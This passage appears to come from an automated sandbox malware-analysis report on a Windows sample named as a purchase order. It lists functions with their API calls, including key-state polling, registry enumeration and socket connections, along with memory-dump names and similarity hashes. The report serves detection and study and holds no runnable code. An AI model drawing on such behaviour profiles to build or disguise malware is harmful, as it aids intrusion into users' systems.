                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00442F2E
                                                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00442F75
                                                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00442FA1
                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00442FAE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                              • String ID:
                                                                                                              • API String ID: 3740051246-0
                                                                                                              • Opcode ID: ed16f4d6592f74a66c59ae9806eb5580d643b85f69b906e4b90ed616ad4bf5f8
                                                                                                              • Instruction ID: 9991695cc6b21d81210aed4df53adeb5b14eaf0472cc89664e48c662818eb96d
                                                                                                              • Opcode Fuzzy Hash: ed16f4d6592f74a66c59ae9806eb5580d643b85f69b906e4b90ed616ad4bf5f8
                                                                                                              • Instruction Fuzzy Hash: A0519A31608244AFD701EF54C981E6FB7F8BF88304F80492EF5959B291DBB4E909DB56
                                                                                                              Function 0044CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ed63be30cb5d4b1d5982652d3ad5f1ef851a4b409d65962b90e6c4d39b71e63b
                                                                                                              • Instruction ID: 961e2332f3601ead6cf14d46e1f2459b5321e473ced96356f71ccd460a0d05ed
                                                                                                              • Opcode Fuzzy Hash: ed63be30cb5d4b1d5982652d3ad5f1ef851a4b409d65962b90e6c4d39b71e63b
                                                                                                              • Instruction Fuzzy Hash: 8241E679E02114ABE750DF68CC84FAABF64EB09350F180136F819A72E1D778AD01D659
                                                                                                              Function 00431206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004312B4
                                                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 004312DD
                                                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0043131C
                                                                                                                • Part of subcall function 003E936C: __swprintf.LIBCMT ref: 003E93AB
                                                                                                                • Part of subcall function 003E936C: __itow.LIBCMT ref: 003E93DF
                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00431341
                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00431349
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 1389676194-0
                                                                                                              • Opcode ID: 6668a84aa2676f27c8b260581e4c2453485fa2b0eee89e1fcbef9ad84995598a
                                                                                                              • Instruction ID: 20c91f5d6618e716f7d432fc29d0b6100db9cb7bb62c2c8469bf7bc7353c1d3b
                                                                                                              • Opcode Fuzzy Hash: 6668a84aa2676f27c8b260581e4c2453485fa2b0eee89e1fcbef9ad84995598a
                                                                                                              • Instruction Fuzzy Hash: 2A413C35A00119DFDB01EF65C991AAEBBF5FF08310B1480A9E906AF3A2DB35ED01CB55
                                                                                                              Function 003FB63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCursorPos.USER32(000000FF), ref: 003FB64F
                                                                                                              • ScreenToClient.USER32(00000000,000000FF), ref: 003FB66C
                                                                                                              • GetAsyncKeyState.USER32(00000001), ref: 003FB691
                                                                                                              • GetAsyncKeyState.USER32(00000002), ref: 003FB69F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                                                              • String ID:
                                                                                                              • API String ID: 4210589936-0
                                                                                                              • Opcode ID: 36002bbc831f88c9439fca78e4fefcaaef1dd4ec48a831542a156d90e68f9e19
                                                                                                              • Instruction ID: 9879d4667539b5ba601abed7507ccf1d28092d0cd5118fef62e6b4f0e120da2d
                                                                                                              • Opcode Fuzzy Hash: 36002bbc831f88c9439fca78e4fefcaaef1dd4ec48a831542a156d90e68f9e19
                                                                                                              • Instruction Fuzzy Hash: FE41AD71A04119FBDF1A8F65C844AE9FBB4FF04325F20431AF82996291CB34A994DF95
                                                                                                              Function 0041B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetWindowRect.USER32(?,?), ref: 0041B369
                                                                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 0041B413
                                                                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0041B41B
                                                                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 0041B429
                                                                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0041B431
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostSleep$RectWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 3382505437-0
                                                                                                              • Opcode ID: 23551be07983cdb195f9c01eb952e4de4cf510b5375e15b1b526a155590c6f72
                                                                                                              • Instruction ID: d32fd5581bd8977598f563e815a153eb0f65351e1c6afab1a73f35102f26841e
                                                                                                              • Opcode Fuzzy Hash: 23551be07983cdb195f9c01eb952e4de4cf510b5375e15b1b526a155590c6f72
                                                                                                              • Instruction Fuzzy Hash: 1931A07190021DEBDF14CF68DD4DADE7BB5EB04319F10822AF921A62D1C3B49954CB95
                                                                                                              Function 0041DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • IsWindowVisible.USER32(?), ref: 0041DBD7
                                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0041DBF4
                                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0041DC2C
                                                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0041DC52
                                                                                                              • _wcsstr.LIBCMT ref: 0041DC5C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                              • String ID:
                                                                                                              • API String ID: 3902887630-0
                                                                                                              • Opcode ID: 5b6be5ec454f8b61528b9ec51633bc5ca93fb41399fa2b8e30b5cce2ccd6c0d8
                                                                                                              • Instruction ID: 6333671f9554ea37f6302de8a2208890f96e871fff9f5567a57394aae1909f3b
                                                                                                              • Opcode Fuzzy Hash: 5b6be5ec454f8b61528b9ec51633bc5ca93fb41399fa2b8e30b5cce2ccd6c0d8
                                                                                                              • Instruction Fuzzy Hash: B32149B1B04104BBEB155F39DC49EBB7BA8DF45710F10403BF909CA191FAA9DC81D2A9
                                                                                                              Function 0041BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0041BC90
                                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0041BCC2
                                                                                                              • __itow.LIBCMT ref: 0041BCDA
                                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0041BD00
                                                                                                              • __itow.LIBCMT ref: 0041BD11
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$__itow
                                                                                                              • String ID:
                                                                                                              • API String ID: 3379773720-0
                                                                                                              • Opcode ID: eb60e2b5f302c06ddb744b6cef5aabdfa1c60a1e0606c51b2498722c1750234b
                                                                                                              • Instruction ID: 4922ff7be0f66b5c2bb50e9294e7bd95386c6ed0801c1e78b8bcfc4eb509cb05
                                                                                                              • Opcode Fuzzy Hash: eb60e2b5f302c06ddb744b6cef5aabdfa1c60a1e0606c51b2498722c1750234b
                                                                                                              • Instruction Fuzzy Hash: 0B21F971B002187BDB11AA66DC46FDF7A68EF5D350F00003AF905EB1C1EB78898587E9
                                                                                                              Function 00426318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003E50E6: _wcsncpy.LIBCMT ref: 003E50FA
                                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,?,004260C3), ref: 00426369
                                                                                                              • GetLastError.KERNEL32(?,?,?,004260C3), ref: 00426374
                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,004260C3), ref: 00426388
                                                                                                              • _wcsrchr.LIBCMT ref: 004263AA
                                                                                                                • Part of subcall function 00426318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,004260C3), ref: 004263E0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                              • String ID:
                                                                                                              • API String ID: 3633006590-0
                                                                                                              • Opcode ID: 339fa4c6cce2da70779bdf04c9bea1a9f97557f4a14cd9248cdfb8cde14fe9f9
                                                                                                              • Instruction ID: ab889cc90e9edb166d5eb842acba57c0f9ed9a14c73f1a9aaf884acaca2d0e1c
                                                                                                              • Opcode Fuzzy Hash: 339fa4c6cce2da70779bdf04c9bea1a9f97557f4a14cd9248cdfb8cde14fe9f9
                                                                                                              • Instruction Fuzzy Hash: D921F631B042254ADB25EA74BC42FFB33ACAF05360F91007BF805D71C0EBA899818A6D
                                                                                                              Function 00438B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0043A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0043A84E
                                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00438BD3
                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00438BE2
                                                                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00438BFE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastconnectinet_addrsocket
                                                                                                              • String ID:
                                                                                                              • API String ID: 3701255441-0
                                                                                                              • Opcode ID: c11a2e00edb802895b82c55fa8f57701ba08b4bb07c7b86a82b640fe49b69ff8
                                                                                                              • Instruction ID: e7064e51471107303ccd7c8cd8be4cff9b9f718528b351f036ab4eaddb737a38
                                                                                                              • Opcode Fuzzy Hash: c11a2e00edb802895b82c55fa8f57701ba08b4bb07c7b86a82b640fe49b69ff8
                                                                                                              • Instruction Fuzzy Hash: 1C21C3317002149FCB14EF28CD85B7EB7A9AF48714F04545EFA169B3D2DBB8AC018766
                                                                                                              Function 00438420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • IsWindow.USER32(00000000), ref: 00438441
                                                                                                              • GetForegroundWindow.USER32 ref: 00438458
                                                                                                              • GetDC.USER32(00000000), ref: 00438494
                                                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 004384A0
                                                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 004384DB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$ForegroundPixelRelease
                                                                                                              • String ID:
                                                                                                              • API String ID: 4156661090-0
                                                                                                              • Opcode ID: c0372414f149803f32240315a2fcebb165a44e7264ebc7679dbf5dc7f7f45936
                                                                                                              • Instruction ID: f7946af6d1eeed4f354f612b630eba5e535f794265d9a05b457fc778d07d755c
                                                                                                              • Opcode Fuzzy Hash: c0372414f149803f32240315a2fcebb165a44e7264ebc7679dbf5dc7f7f45936
                                                                                                              • Instruction Fuzzy Hash: 95219F35B00214AFD700DFA5DD84AAEBBE5EF48305F048879E94A9B251DA74AC00CBA4
                                                                                                              Function 003FAF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 003FAFE3
                                                                                                              • SelectObject.GDI32(?,00000000), ref: 003FAFF2
                                                                                                              • BeginPath.GDI32(?), ref: 003FB009
                                                                                                              • SelectObject.GDI32(?,00000000), ref: 003FB033
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                                                              • String ID:
                                                                                                              • API String ID: 3225163088-0
                                                                                                              • Opcode ID: b3a56ee355c72ce00df717a1c1c3111fca163dd3f52fdc6bb1040054d6cab0b0
                                                                                                              • Instruction ID: 2e3f19e9d2af2d223a671ab901c1d00f6bbf8d3de42700cad5d6ef2225ed5562
                                                                                                              • Opcode Fuzzy Hash: b3a56ee355c72ce00df717a1c1c3111fca163dd3f52fdc6bb1040054d6cab0b0
                                                                                                              • Instruction Fuzzy Hash: C021A1B0900309EFDB119F55EC847AE7F68B712355F18423AF525D61F0D7B04945CB99
                                                                                                              Function 0040217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __calloc_crt.LIBCMT ref: 004021A9
                                                                                                              • CreateThread.KERNEL32(?,?,004022DF,00000000,?,?), ref: 004021ED
                                                                                                              • GetLastError.KERNEL32 ref: 004021F7
                                                                                                              • _free.LIBCMT ref: 00402200
                                                                                                              • __dosmaperr.LIBCMT ref: 0040220B
                                                                                                                • Part of subcall function 00407C0E: __getptd_noexit.LIBCMT ref: 00407C0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2664167353-0
                                                                                                              • Opcode ID: 1b8125957ec3fe480c03855b9e0473d7861805bd333e0b49e6989315e44a8139
                                                                                                              • Instruction ID: 41af6ac61813a2dc935315f80a6ef60154cfbc4965516c3b81c51833fb5eade2
                                                                                                              • Opcode Fuzzy Hash: 1b8125957ec3fe480c03855b9e0473d7861805bd333e0b49e6989315e44a8139
                                                                                                              • Instruction Fuzzy Hash: 4C1129326043066FD710AFE6DD45D5B3798EF44724710003FF914B62C1EBB9D8118AA9
                                                                                                              Function 0041ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0041ABD7
                                                                                                              • GetLastError.KERNEL32(?,0041A69F,?,?,?), ref: 0041ABE1
                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,0041A69F,?,?,?), ref: 0041ABF0
                                                                                                              • HeapAlloc.KERNEL32(00000000,?,0041A69F,?,?,?), ref: 0041ABF7
                                                                                                              • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0041AC0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 842720411-0
                                                                                                              • Opcode ID: 53794ca6fd7fc95164c781fab23b6a1c4952e1eb48662911b2dd56e6acb5073f
                                                                                                              • Instruction ID: 2b9debebed50b4b2f937d6877789bbd24676c7d506f4d68f058fb2a52a55ea27
                                                                                                              • Opcode Fuzzy Hash: 53794ca6fd7fc95164c781fab23b6a1c4952e1eb48662911b2dd56e6acb5073f
                                                                                                              • Instruction Fuzzy Hash: 8E011D71B01205BFDB114FA5DC48DAB3BADEF8A755710042AF945C7250E7B19C90CBA9
                                                                                                              Function 00427A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00427A74
                                                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00427A82
                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00427A8A
                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00427A94
                                                                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00427AD0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                              • String ID:
                                                                                                              • API String ID: 2833360925-0
                                                                                                              • Opcode ID: 206777b134126ee01cce4645fc4487ddf17220bd3b6efd04a0d8276e24df5263
                                                                                                              • Instruction ID: b5b2c97fdb7ea30fbdea88ad75dd609e54fedb3fe370ff07ff96f059694d8ba5
                                                                                                              • Opcode Fuzzy Hash: 206777b134126ee01cce4645fc4487ddf17220bd3b6efd04a0d8276e24df5263
                                                                                                              • Instruction Fuzzy Hash: B7018431E04629DBCF009FE5EC499DDBB78FF09311F404056D501B2150DBB49650C76A
                                                                                                              Function 00419ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CLSIDFromProgID.OLE32 ref: 00419ADC
                                                                                                              • ProgIDFromCLSID.OLE32(?,00000000), ref: 00419AF7
                                                                                                              • lstrcmpiW.KERNEL32(?,00000000), ref: 00419B05
                                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00419B15
                                                                                                              • CLSIDFromString.OLE32(?,?), ref: 00419B21
                                                                                                              Memory Dump Source
